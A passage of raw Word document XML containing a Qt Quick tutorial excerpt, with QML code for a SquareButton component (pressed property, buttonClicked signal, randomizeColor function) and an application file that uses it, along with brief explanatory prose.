        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1"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be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1"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be-BY"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id</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root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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pressed</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mouseArea</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pressed</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signal buttonClicked</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real xPos</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real yPos</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> randomizeColor</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root</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color </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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</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rgba</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</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random</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</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random</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</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random</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> side</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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width</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side</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height</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side</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</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id</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mouseArea</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        anchors</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fill</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parent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onClicked</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root</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buttonClicked</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mouse</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x</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mouse</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y</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object could make use of the</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pressed</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property,</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buttonClicked</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal and</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>randomizeColor()</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method that have been added to the root</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1"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307B1">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// application.qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1"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307B1">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B307B1"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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</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id</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squareButton</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onButtonClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Clicked"</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xPos</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yPos</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randomizeColor</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87F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1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87F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</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text</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squareButton</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pressed </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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Down"</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r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Up"</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00187F1A" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6215" w:rsidRPr="00B170D3" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that any of the</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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values defined in</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SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are not accessible to</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
